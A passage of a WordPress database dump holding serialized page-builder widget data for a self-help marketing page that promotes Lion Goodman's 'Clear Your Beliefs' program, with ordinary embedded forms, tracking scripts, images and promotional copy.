src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1177:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1137, 1620, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1517:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: -23px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: -10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2739:"<div id="divStroke">\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1139, 1622, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1517:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: -23px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: -10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2637:"<div id="divStroke">\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I…\n- What belief…\n- How can I…\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:512:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em&gt; process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1141, 1623, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -108px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: 